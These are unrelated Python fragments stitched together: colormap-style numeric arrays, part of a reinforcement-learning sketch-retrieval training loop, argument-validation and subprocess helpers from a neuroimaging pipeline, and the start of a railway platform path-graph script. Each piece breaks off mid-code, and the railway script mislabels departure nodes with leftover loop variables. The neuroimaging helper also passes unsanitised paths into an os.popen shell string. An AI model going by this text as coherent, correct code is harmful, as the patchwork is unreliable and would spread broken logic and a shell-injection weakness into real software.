0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0156250, 0.0312500, 0.0625000, 0.0820312,
0.0976562, 0.1132812, 0.1484375, 0.1640625, 0.1796875, 0.1992188,
0.2148438, 0.2460938, 0.2617188, 0.2812500, 0.2968750, 0.3281250,
0.3476562, 0.3632812, 0.3789062, 0.4140625, 0.4296875, 0.4453125,
0.4648438, 0.4960938, 0.5117188, 0.5273438, 0.5468750, 0.5625000,
0.5937500, 0.6132812, 0.6289062, 0.6445312, 0.6796875, 0.6953125,
0.7109375, 0.7304688, 0.7617188, 0.7773438, 0.7929688, 0.8125000,
0.8437500, 0.8593750, 0.8789062, 0.8945312, 0.9101562, 0.9453125,
0.9609375, 0.9765625, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9765625, 0.9453125,
0.9296875, 0.9101562, 0.8945312, 0.8632812, 0.8437500, 0.8281250,
0.8125000, 0.7773438, 0.7617188, 0.7460938, 0.7304688, 0.6953125,
0.6796875, 0.6640625, 0.6445312, 0.6289062, 0.5976562, 0.5781250,
0.5625000, 0.5468750, 0.5117188, 0.4960938, 0.4804688, 0.4648438,
0.4296875, 0.4140625, 0.3984375, 0.3789062, 0.3476562, 0.3320312,
0.3125000, 0.2968750, 0.2812500, 0.2460938, 0.2304688, 0.2148438,
0.1992188, 0.1640625, 0.1484375, 0.1328125, 0.1132812, 0.0820312,
0.0664062, 0.0468750, 0.0312500, 0.0000000]),
array([ 0.0000000, 0.0117188, 0.0273438, 0.0390625, 0.0546875, 0.0742188,
0.0898438, 0.1093750, 0.1250000, 0.1484375, 0.1679688, 0.1875000,
0.2070312, 0.2304688, 0.2460938, 0.2656250, 0.2812500, 0.3007812,
0.3164062, 0.3359375, 0.3554688, 0.3710938, 0.3906250, 0.4062500,
0.4257812, 0.4414062, 0.4609375, 0.4765625, 0.4960938, 0.5156250,
0.5312500, 0.5507812, 0.5664062, 0.5859375, 0.6015625, 0.6210938,
0.6367188, 0.6562500, 0.6757812, 0.6914062, 0.7109375, 0.7265625,
0.7460938, 0.7617188, 0.7812500, 0.7968750, 0.8164062, 0.8359375,
0.8515625, 0.8710938, 0.8867188, 0.9062500, 0.9218750, 0.9414062,
0.9570312, 0.9765625, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9609375, 0.9453125, 0.9296875,
0.9101562, 0.8789062, 0.8593750, 0.8437500, 0.8281250, 0.7929688,
0.7773438, 0.7617188, 0.7460938, 0.7304688, 0.6953125, 0.6796875,
0.6640625, 0.6445312, 0.6132812, 0.5937500, 0.5781250, 0.5625000,
0.5273438, 0.5117188, 0.4960938, 0.4804688, 0.4453125, 0.4296875,
0.4140625, 0.3984375, 0.3789062, 0.3476562, 0.3281250, 0.3125000,
0.2968750, 0.2617188, 0.2460938, 0.2304688, 0.2148438, 0.1796875,
0.1640625, 0.1484375, 0.1328125, 0.0976562, 0.0820312, 0.0625000,
0.0468750, 0.0312500, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000]),
array([ 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, | |
1:
one_hot.append(target_img)
if rank > 5:
Reward = 0.
R_back = 0.
else:
Reward = 1.
R_back = 1.
# elif epoch <= 20:
# if rank > 15:
# Reward = 0.
# R_back = 0.
# else:
# Reward = 1.
# R_back = 1.
# if epoch <= 100:
# if rank > 10:
# Reward = 0.
# R_back = 0.
# else:
# Reward = 1.
# R_back = 1.
# else:
# if rank > 5:
# Reward = 0.
# R_back = 0.
# else:
# Reward = 1.
# R_back = 1.
# if rank > 5:
# Reward = 0.
# R_back = 0.
# else:
# Reward = 1.
# R_back = 1.
R.append(torch.tensor([Reward]))
Reward_back.append(torch.tensor([R_back]))
# R = torch.tensor(R)
# Reward_back = torch.tensor(Reward_back)
# R_list.append(R)
# Reward_back_list.append(Reward_back)
# RL_loss = RL_loss / len(sketch_name_list)
R = torch.stack(R)
Reward_back = torch.stack(Reward_back)
# R = torch.stack(R_list).transpose(1,0).to(self.device)
# Reward_back = torch.stack(Reward_back_list).transpose(1, 0).to(self.device)
one_hot = torch.cat(one_hot)
assert one_hot[-1].sum() == target_img.sum()
# loss_action_back = torch.mean(F.mse_loss(action, one_hot, reduction='none'), dim=1)
# print("loss_action_back", loss_action_back)
# calculate reward
# predicted = torch.max(log_probas, 1)[1]
# R = (predicted.detach() == y).float()
# if (epoch < 100):
# R = ((1.0 / loss_action_back.detach()) > 70).float()
# elif (epoch < 200):
# R = ((1.0 / loss_action_back.detach()) > 75).float()
# else:
# R = ((1.0 / loss_action_back.detach()) > 80).float()
# print('R', R)
R = R.repeat(1, self.num_glimpses).to(self.device)
loss_action = F.mse_loss(action, one_hot)
# print('loss_action', loss_action)
# loss_baseline = F.mse_loss(baselines, R)
# print("loss_base",loss_baseline)
# print("base", baselines)
# loss_entropy = -torch.mean(entropys)
# compute reinforce loss
# summed over time steps and averaged across batch
adjusted_reward = R
loss_reinforce = torch.sum(-log_pi * adjusted_reward, dim=1)
loss_reinforce = torch.mean(loss_reinforce, dim=0)
# sum up into a hybrid loss
# if epoch <= 30:
# loss = loss_action + 0.01 * loss_reinforce + 0.01 * loss_entropy
# else:
loss = 0.01 * loss_reinforce + loss_action
# elif epoch <= 100:
# loss = loss_action + 0.01 * loss_reinforce + 0.1 * loss_entropy
# elif epoch <= 200:
# loss = loss_action + 0.01 * loss_reinforce + 0.05 * loss_entropy
# elif epoch <= 500:
# loss = loss_action + 0.01 * loss_reinforce + 0.01 * loss_entropy
# else:
# loss = loss_action + 0.01 * loss_reinforce
loss_buffer.append(loss)
# acc = adjusted_reward.squeeze().mean()
# R = R.squeeze().mean()
Reward_back = Reward_back.squeeze().mean()
# store
# print('h_t', h_t)
# print('h_t_norm', torch.norm(h_t))
losses.update(loss.item(), x.size()[0])
losses_action.update(loss_action.item(), x.size()[0])
losses_reinforce.update(loss_reinforce.item(), x.size()[0])
# losses_baseline.update(loss_baseline.item(), x.size()[0])
# accs.update(acc.item(), x.size()[0])
reward.update(Reward_back, x.size()[0])
# compute gradients and update SGD
policy_loss = torch.stack(loss_buffer).mean()
policy_loss.backward()
# utils.clip_grad_norm_(self.model.classifier.parameters(), 40)
# print('classifer_weight_grad', self.model.classifier.fc.weight.grad)
# print('classifer_bias_grad', self.model.classifier.fc.bias.grad)
# print('sensor_weight1_grad', self.model.sensor.fc1.weight.grad)
# print('sensor_bias1_grad', self.model.sensor.fc1.bias.grad)
# print('rnn_i2h_grad', self.model.rnn.i2h.weight.grad)
# print('rnn_h2h_grad', self.model.rnn.h2h.weight.grad)
self.optimizer.step()
# measure elapsed time
toc = time.time()
batch_time.update(toc - tic)
pbar.set_description(
(
"{:.1f}s - loss: {:.3f} - reward: {:.3f}-action loss: {:.3f}-location loss: {:.3f}".format(
(toc - tic), losses.avg, reward.avg, losses_action.avg, losses_reinforce.avg
)
)
)
pbar.update(self.batch_size*17)
# dump the glimpses and locs
if plot:
# imgs = [g.cpu().data.numpy().squeeze(1) for g in imgs]
# locs = torch.stack(locs).transpose(1,0)
# locs = [l.cpu().data.numpy() for l in locs]
imgs = torch.cat(imgs).cpu().data.numpy().squeeze(1)
locs = []
for loc_index in range(12):
locs.append(torch.cat([locs_list[0][loc_index], locs_list[1][loc_index]]))
# imgs = [g.cpu().data.numpy().squeeze() for g in imgs]
# locs = [l.cpu().data.numpy() for l in locs_list[0]]
assert len(locs) == self.num_glimpses
pickle.dump(
imgs, open(self.plot_dir + "g_{}.p".format(epoch + 1), "wb")
)
pickle.dump(
locs, open(self.plot_dir + "l_{}.p".format(epoch + 1), "wb")
)
# log to tensorboard
# if self.use_tensorboard:
# iteration = epoch * len(self.train_loader) + i
# log_value("train_loss", losses.avg, iteration)
# log_value("train_reward", reward.avg, iteration)
# log_value("train_acc", accs.avg, iteration)
# log_value("train_loss_action", losses_action.avg, iteration)
# log_value("train_loss_reinforce", losses_reinforce.avg, iteration)
# log_value("train_loss_baseline", losses_baseline.avg, iteration)
# log_value("action_log_probablity", ac_p,iteration)
# log_value("location_log_probablity", p, iteration)
# log_value("h_t_norm", torch.norm(h_t), iteration)
return losses.avg, reward.avg, losses_action.avg, losses_reinforce.avg
@torch.no_grad()
def validate1(self, epoch):
"""Evaluate the RAM model on the validation set.
"""
# losses = AverageMeter()
# accs = AverageMeter()
self.model.eval()
# num_of_Sketch_Step = len(self.Sketch_Array_Valid[0])
avererage_area = []
rank_all = torch.zeros(len(self.Sketch_Array_Valid))
Image_Array_Valid = []
previous_query = ""
for i, sampled_batch in enumerate(self.valid_loader):
# x, y = x.to(self.device), y.to(self.device)
sketch_name = self.Sketch_Name_Valid[i]
assert sketch_name == sampled_batch["sketch_path"][0]
sketch_query_name = '_'.join(sketch_name.split('/')[-1].split('_')[:-1])
position_query = self.Image_Name_Test.index(sketch_query_name)
if (previous_query != position_query):
previous_query = position_query
target = self.Image_Array_Test[position_query].unsqueeze(0)
Image_Array_Valid.append(target)
Image_Array_Valid = torch.cat(Image_Array_Valid)
for i, sampled_batch in enumerate(self.valid_loader):
sketch_name = self.Sketch_Name_Valid[i]
assert sketch_name == sampled_batch["sketch_path"][0]
sketch_query_name = '_'.join(sketch_name.split('/')[-1].split('_')[:-1])
position_query = self.Image_Name_Test.index(sketch_query_name)
x = sampled_batch['sketch_img'][-1].to(self.device)
# duplicate M times
# x = x.repeat(self.M, 1, 1, 1)
# initialize location vector and hidden state
self.batch_size = x.shape[0]
h_t, l_t = self.reset()
# h_t = torch.tensor(self.Sketch_Array_Valid[i][-1], dtype=torch.float,device=self.device,requires_grad=True ).unsqueeze(0)
# h_t = self.Sketch_Array_Train[i][-1].clone().detach().float().unsqueeze(0).to(self.device).requires_grad_(True)
# extract the glimpses
# log_pi = []
# baselines = []
for t in range(self.num_glimpses - 1):
# forward pass through model
h_t, l_t, b_t, p, entropy = self.model(x, l_t, h_t, epoch, t, True)
# last iteration
h_t, l_t, b_t, action, a_p, p, entropy = self.model(x, l_t, h_t, epoch, t, True, last=True)
# action, _ = self.model(h_t, last=True)
target_distance = F.pairwise_distance(action,
self.Image_Array_Test[position_query].unsqueeze(0))
distance = F.pairwise_distance(action, Image_Array_Valid)
rank_all[i] = distance.le(target_distance).sum()
if rank_all[i].item() == 0:
avererage_area.append(1.)
else:
avererage_area.append(1. / rank_all[i].item())
top1_accuracy = rank_all.le(5).sum().numpy() / rank_all.shape[0]
meanIOU = np.mean(avererage_area)
# log to tensorboard
if self.use_tensorboard:
iteration = epoch * len(self.valid_loader) + i
log_value("valid_avg_reward", meanIOU, iteration)
log_value("valid_top5_acc", top1_accuracy, iteration)
return meanIOU, top1_accuracy
@torch.no_grad()
def validate(self, epoch):
"""Evaluate the RAM model on the validation set.
"""
# num_of_Sketch_Step = len(self.Sketch_Array_Valid[0])
self.model.eval()
avererage_area = []
average_rp = []
rank_all = torch.zeros(len(self.Sketch_Array_Valid), 17)
Image_Array_Valid = []
previous_query = ""
for i, sampled_batch in enumerate(self.valid_loader):
# x, y = x.to(self.device), y.to(self.device)
sketch_name = self.Sketch_Name_Valid[i]
assert sketch_name == sampled_batch["sketch_path"][0]
sketch_query_name = '_'.join(sketch_name.split('/')[-1].split('_')[:-1])
position_query = self.Image_Name_Test.index(sketch_query_name)
if (previous_query != position_query):
previous_query = position_query
target = self.Image_Array_Test[position_query].unsqueeze(0)
Image_Array_Valid.append(target)
Image_Array_Valid = torch.cat(Image_Array_Valid)
for i, sampled_batch in enumerate(self.valid_loader):
sketch_name = self.Sketch_Name_Valid[i]
assert sketch_name == sampled_batch["sketch_path"][0]
sketch_query_name = '_'.join(sketch_name.split('/')[-1].split('_')[:-1])
position_query = self.Image_Name_Test.index(sketch_query_name)
for j, sampled_sketch in enumerate(sampled_batch['sketch_img']):
x = sampled_sketch.to(self.device)
# initialize location vector and hidden state
self.batch_size = x.shape[0]
h_t, l_t = self.reset()
# extract the glimpses
for t in range(self.num_glimpses - 1):
# forward pass through model
h_t, l_t, b_t, p, entropy = self.model(x, l_t, h_t, epoch, t, True)
# last iteration
h_t, l_t, b_t, action, p, entropy = self.model(x, l_t, h_t, epoch, t, True, last=True)
# action = 0.1*action + 0.9*standard
target_distance = F.pairwise_distance(action,
self.Image_Array_Test[position_query].unsqueeze(0))
distance = F.pairwise_distance(action, Image_Array_Valid)
rank_all[i, j] = distance.le(target_distance).sum()
rank_percentile = ((len((distance == target_distance).nonzero(as_tuple=True)) // 2) + len(self.Image_Name_Test) - rank_all[i,j]) / len(self.Image_Name_Test)
average_rp.append(rank_percentile)
if rank_all[i, j].item() == 0:
avererage_area.append(1.)
else:
avererage_area.append((1. / rank_all[i, j].item()))
top5_accuracy = rank_all[:,-1].le(5).sum().numpy() / rank_all.shape[0]
top10_accuracy = rank_all[:,-1].le(10).sum().numpy() / rank_all.shape[0]
meanIOU = np.mean(avererage_area)
rp = np.mean(average_rp)
# log to tensorboard
# if self.use_tensorboard:
# iteration = epoch * len(self.valid_loader) + i
# log_value("valid_avg_reward", meanIOU, iteration)
# log_value("valid_top5_acc", top5_accuracy, iteration)
self.model.train()
return meanIOU, top5_accuracy, top10_accuracy, rp
@torch.no_grad()
def test1(self):
"""Test the RAM model.
This function should only be called at the very
end once the model has finished training.
"""
# load the best checkpoint
self.load_checkpoint(best=self.best)
# self.Sketch_Array_Test = self.Sketch_Array_Test[100:]
# self.Sketch_Name_Test = self.Sketch_Name_Test[100:]
self.model.eval()
avererage_area = []
average_rp = []
rank_all = torch.zeros(len(self.Sketch_Array_Test), 17)
rank_inverse = torch.zeros(len(self.Sketch_Array_Test), 17)
rank_rp = torch.zeros(len(self.Sketch_Array_Test), 17)
imgs = []
locs_list = []
# Image_Array_Valid = []
# previous_query = ""
#
# for i, sampled_batch in enumerate(self.valid_loader):
# # x, y = x.to(self.device), y.to(self.device)
#
# sketch_name = self.Sketch_Name_Valid[i]
# assert sketch_name == sampled_batch["sketch_path"][0]
# sketch_query_name = '_'.join(sketch_name.split('/')[-1].split('_')[:-1])
# position_query = self.Image_Name_Test.index(sketch_query_name)
# if (previous_query != position_query):
# previous_query = position_query
# target = self.Image_Array_Test[position_query].unsqueeze(0)
# Image_Array_Valid.append(target)
# Image_Array_Valid = torch.cat(Image_Array_Valid)
for i, sampled_batch in enumerate(self.test_loader):
sketch_name = self.Sketch_Name_Test[i]
assert sketch_name == sampled_batch["sketch_path"][0]
sketch_query_name = '_'.join(sketch_name.split('/')[-1].split('_')[:-1])
position_query = self.Image_Name_Test.index(sketch_query_name)
if i % 5 == 0:
imgs = []
locs_list = []
for j, sampled_sketch in enumerate(sampled_batch['sketch_img']):
x = sampled_sketch.to(self.device)
# initialize location vector and hidden state
self.batch_size = x.shape[0]
h_t, l_t = self.reset()
if j==8 or j==16:
imgs.append(x)
# h_t = torch.tensor(self.Sketch_Array_Valid[i][-1],dtype=torch.float,device=self.device,requires_grad=True ).unsqueeze(0)
# h_t | |
multiple times in parallel
:param scriptname: String describing the script being run in parallel
:param processes: List of multiprocessing.Process objects ready to run
:param sleep_secs: Integer, how many seconds to wait between (a) process
submissions and (b) checking if all processes finished
:param show: True to show the user what's running at sleep_secs intervals;
otherwise False
"""
started = datetime.now()
submitted = list()
failed = False
for each_process in processes:
submitted.append(each_process.start())
time.sleep(sleep)
while any((p.exitcode is None) for p in processes):
time.sleep(sleep)
if show:
get_and_print_time_since(scriptname + ' started', started)
if not all(p.exitcode is None or p.exitcode == 0 for p in processes):
failed = True
for p in processes:
p.terminate()
if failed:
sys.exit('Error: {} subprocess failed.'.format(scriptname))
def run_python_subscript(path_to_subscript, run, to_replace, *args):
"""
Use subprocess to run a Python 3.6+ script from this code base
:param path_to_subscript: String, valid path to real Python 3.6+ script
:param cli_args: Dictionary containing all command-line arguments from user
:param run: Whole number (as an int or a string) defining which run this is
:param to_replace: String to find and replace with each run name/id
:param args: Unpacked list of parameters to run subscript with
"""
start_time = datetime.now()
try:
subprocess.check_call(individualize_subprocess_run(
['python3', path_to_subscript, *args], run, to_replace
))
except subprocess.CalledProcessError:
err_type, err_msg, _ = sys.exc_info() # TODO make this into a reusable function? See run_level_1_analysis.get_events_make_template
sys.exit('\n\n{}: {}\n\n'.format(err_type.__name__, err_msg))
get_and_print_time_since(os.path.basename(path_to_subscript)
+ ' started', start_time)
return # Explicitly end this function so multiprocessing knows it's done
def save_to_json_and_get_path(a_dict, dict_name, out_dir):
"""
:param a_dict: Dictionary with only string keys
:param dict_name: String naming a_dict
:param out_dir: String, a valid path to a real directory to save
the .json file containing a_dict into
:return: String, the full path to the .json file containing a_dict
"""
json_path = os.path.join(out_dir, 'abcd-bids-pipeline-{}_{}.json'.format(
dict_name, datetime.now().strftime('%Y-%b-%d_%H-%M')
))
with open(json_path, 'w+') as json_file:
json_file.write(json.dumps(a_dict))
return json_path
def valid_float_0_to_1(val):
"""
:param val: Object to check, then throw an error if it is invalid
:return: val if it is a float between 0 and 1 (otherwise invalid)
"""
return validate(val, lambda x: 0 <= float(x) <= 1, float,
'Value must be a number between 0 and 1')
def valid_output_dir(path):
"""
Try to make a folder for new files at path; throw exception if that fails
:param path: String which is a valid (not necessarily real) folder path
:return: String which is a validated absolute path to real writeable folder
"""
return validate(path, lambda x: os.access(x, os.W_OK),
valid_readable_dir, 'Cannot create directory at {}',
lambda y: os.makedirs(y, exist_ok=True))
def valid_readable_dir(path):
"""
:param path: Parameter to check if it represents a valid directory path
:return: String representing a valid directory path
"""
return validate(path, os.path.isdir, valid_readable_file,
'Cannot read directory at {}')
def valid_readable_file(path):
"""
Throw exception unless parameter is a valid readable filepath string. Use
this, not argparse.FileType('r') which leaves an open file handle.
:param path: Parameter to check if it represents a valid filepath
:return: String representing a valid filepath
"""
return validate(path, lambda x: os.access(x, os.R_OK),
os.path.abspath, 'Cannot read file at {}')
def valid_readable_json(path):
"""
:param path: Parameter to check if it represents a valid .json file path
:return: String representing a valid .json file path
"""
return validate(path, lambda x: os.path.splitext(path)[-1] == '.json',
valid_readable_file, '{} is not a readable .json filepath')
def valid_subj_ses(in_arg, prefix, name): #, *keywords):
"""
:param in_arg: Object to check if it is a valid subject ID or session name
:param prefix: String, 'sub-' or 'ses-'
:param name: String describing what in_arg should be (e.g. 'subject')
:return: True if in_arg is a valid subject ID or session name; else False
"""
return validate(in_arg, lambda _: True, # lambda x: any([key in x for key in [prefix, *keywords]]),
lambda y: (y if y[:len(prefix)] == prefix else prefix + y),
'{}' + ' is not a valid {}'.format(name))
def valid_template_filename(fname):
"""
:param fname: Parameter to check if it represents a .fsf file name
:return: String representing the .fsf file name
"""
return validate(fname, lambda x: os.path.splitext(x)[-1] == '.fsf',
lambda y: y, '{} is not an .fsf file name')
def valid_time_str(in_arg):
"""
:param in_arg: Object to check if it's a time string in the HH:MM:SS format
:return: True if in_arg is a time limit string in that format; else False
"""
try:
split = in_arg.split(":")
assert len(split) == 3
for each_num in split:
assert each_num.isdigit()
assert int(each_num) >= 0
return in_arg
except (TypeError, AssertionError, ValueError):
raise argparse.ArgumentTypeError('Invalid time string.')
def valid_whole_number(to_validate):
"""
Throw argparse exception unless to_validate is a positive integer
:param to_validate: Object to test whether it is a positive integer
:return: to_validate if it is a positive integer
"""
return validate(to_validate, lambda x: int(x) >= 0, int,
'{} is not a positive integer')
def validate(to_validate, is_real, make_valid, err_msg, prepare=None):
"""
Parent/base function used by different type validation functions. Raises an
argparse.ArgumentTypeError if the input object is somehow invalid.
:param to_validate: String to check if it represents a valid object
:param is_real: Function which returns true iff to_validate is real
:param make_valid: Function which returns a fully validated object
:param err_msg: String to show to user to tell them what is invalid
:param prepare: Function to run before validation
:return: to_validate, but fully validated
"""
try:
if prepare:
prepare(to_validate)
assert is_real(to_validate)
return make_valid(to_validate)
except (OSError, TypeError, AssertionError, ValueError,
argparse.ArgumentTypeError):
raise argparse.ArgumentTypeError(err_msg.format(to_validate))
def validate_cli_args(cli_args, parser, arg_names=set()):
"""
Validate types and set defaults for any arg whose validation depends on
another arg and therefore was not possible in get_pipeline_cli_argparser
:param cli_args: Dictionary containing all command-line arguments from user
:param parser: argparse.ArgumentParser to raise error if anything's invalid
:param arg_names: Set containing SCAN_ARG if that argument is needed
:return: cli_args, but fully validated
"""
# Default levels, template file directory, and scanner info file path
cli_args = ensure_dict_has(cli_args, 'levels', [1, 2]
if len(cli_args['runs']) > 1 else [1])
cli_args = ensure_dict_has(cli_args, 'templates',
os.path.join(SCRIPT_DIR, 'templates'))
if SCAN_ARG in arg_names:
cli_args = ensure_dict_has(cli_args, SCAN_ARG, os.path.join(
SCRIPT_DIR, 'scan_info', SCAN_ARG + '.csv'
))
for lvl in cli_args['levels']: # Default template file names
cli_args = ensure_dict_has(cli_args, 'template{}'.format(lvl), (
'template_DCAN_version_{}_level{}_UPDATED_FINAL.fsf'
.format(cli_args['task'], lvl)
))
validate_template_file(cli_args, lvl, parser)
# Default paths to FSL and wb_command
ERR_MSG = 'No {} found. Please include the {} argument.'
if not (dict_has(cli_args, 'wb_command') and
os.access(cli_args['wb_command'], os.X_OK)):
parser.error(ERR_MSG.format('wb_command executable', '--wb-command'))
if not dict_has(cli_args, 'fsl_dir'):
fsl = get_default_ext_command('fsl')
cli_args['fsl_dir'] = os.path.dirname(fsl) if fsl else parser.error(
ERR_MSG.format('FSL directory', '--fsl-dir')
)
# Default output/temp/event files directories. Avoiding ensure_dict_has to
if not dict_has(cli_args, 'output'): # prevent permissions error from
cli_args['output'] = valid_output_dir( # valid_output_dir making dirs.
os.path.join(cli_args['study_dir'], 'derivatives', 'abcd-bids-tfm'
'ri-pipeline', cli_args['subject'], cli_args['ses'])
)
for arg in ('temp_dir', 'events_dir'):
if not dict_has(cli_args, arg):
cli_args[arg] = valid_output_dir(
os.path.join(cli_args['output'], 'level-1', arg.split('_')[0])
)
return cli_args
def validate_template_file(cli_args, lvl, parser):
"""
Verify that template .fsf file exists
:param cli_args: Dictionary containing all command-line arguments from user
:param lvl: String or int defining the analysis level, 1 or 2 or "1" or "2"
:param parser: argparse.ArgumentParser to raise error if anything's invalid
"""
tmpl = 'template{}'.format(lvl)
tmpl_fpath = os.path.join(cli_args['templates'], cli_args[tmpl])
if not os.path.exists(tmpl_fpath):
parser.error('{} does not exist. Please re-run with a different --{} '
'or --templates argument.'.format(tmpl_fpath, tmpl))
def wb_command(cli_args, *args):
"""
Call wb_command executable with any given parameters
:param cli_args: Dictionary mapping 'wb_command' key to wb_command filepath
:param args: List of all parameters to call wb_command with, in order
"""
subprocess.check_call([cli_args['wb_command'], *args])
def wb_command_get_info(wb_command, dtseries, arg_only):
"""
Call wb_command with -file-information and -no-map-info parameters
:param wb_command: String, path to existing workbench wb_command executable
:param dtseries: String, the path to a .dtseries.nii file with file info
:param arg_only: String, the last part of the name of a wb_command
argument starting with '-only-'
:return: String representing a numerical value describing the dtseries
"""
return os.popen('{} -file-information {} -no-map-info -only-{}'
.format(wb_command, dtseries, arg_only)).read().rstrip()
def wb_LR_pair(func_LR, arg_LR=None, after=True):
"""
Get wb_command left- and right- arguments
:param func_LR: Function which accepts 'L' or 'R' and returns a filepath
:param arg_LR: String naming the left- or right- argument
:param after: | |
import networkx as nx
from datetime import datetime, time, timedelta
import matplotlib.pyplot as plt
import heapq
import random
import dill
colors = {"arr": "green", "pf": "gray", "mid": "blue", "dep": "red"}
time_format = "%H:%M:%S"
date_format = "%d:%m:%Y"
cb_dummy = 1000
cb_regular = 1
headway = 0
tmax = 1440
gd = {}
n_pfs = 3
n_dir = 2
n_mid = 5
n_prty = 3
# seed = 42
# random.seed(seed)
# In_paths with their ids : [Path]
arr_paths = {}
# Out Paths with their ids : [Path]
dep_paths = {}
# pf id
pf_id = {}
# in Paths from a given direction (dir : [in_path ids])
in_paths_from = {}
# out Paths from a given platform to a given direction (pf,dir: [out paths ids])
out_paths_from = {}
# pig for
PIG = nx.Graph()
PIG_labels = dict()
def check_incompat(p1, p2):
for d in p1:
if d[0] == "D":
continue
if d in p2:
return True
return False
def get_available(paths):
avlbl = []
for idx, path in enumerate(paths):
if not path:
avlbl.append(idx)
return avlbl
def create_PIG_nodes():
for in_dir, in_paths in in_paths_from.items():
for in_path_id in in_paths:
# print(f"in_path_id - {in_path_id} : {arr_paths[in_path_id][-1]}")
pf = arr_paths[in_path_id][-1]
PIG.add_node(f"{in_dir}-{in_path_id}", path_type=0,
data=arr_paths[in_path_id], idx=in_path_id, pf=pf)
PIG_labels[f"{in_dir}-{in_path_id}"] = arr_paths[in_path_id]
for pf, out_dir_dict in out_paths_from.items():
for out_dir, out_paths in out_dir_dict.items():
for out_path_id in out_paths:
pf = dep_paths[out_path_id][0]
PIG.add_node(f"{out_dir}-{out_path_id}",
path_type=1, data=dep_paths[out_path_id], idx=out_path_id, pf=pf)
PIG_labels[f"{in_dir}-{in_path_id}"] = dep_paths[out_path_id]
def create_PIG_edges():
# in_path_edges
labels = {
0: "in-in",
1: "in-out",
2: "out-out"
}
for idx, n1 in enumerate(list(PIG.nodes)[:-1]):
for idx2, n2 in enumerate(list(PIG.nodes)[idx+1:]):
node1 = PIG.nodes[n1]
node2 = PIG.nodes[n2]
if check_incompat(node1["data"], node2["data"]):
edge_type = node1["path_type"] + node2["path_type"]
PIG.add_edge(n1, n2, edge_type=labels[edge_type])
# PIG_labels[f"{n1}-{n2}"] = labels[edge_type]
def get_in_paths_from(arr_paths):
for idx, path in enumerate(arr_paths):
if path[0] not in in_paths_from.keys():
in_paths_from[path[0]] = []
in_paths_from[path[0]].append(idx)
def get_out_paths_from(dep_paths):
for idx, path in enumerate(dep_paths):
if path[0] not in out_paths_from.keys():
out_paths_from[path[0]] = {}
if path[-1] not in out_paths_from[path[0]].keys():
out_paths_from[path[0]][path[-1]] = []
out_paths_from[path[0]][path[-1]].append(idx)
def get_pf_ids(pf):
for idx, p in enumerate(pf):
pf_id[p[0]] = idx
def one_hot(data, n):
val = [1 if i in data else 0 for i in range(n)]
return val
class PriorityQueue:
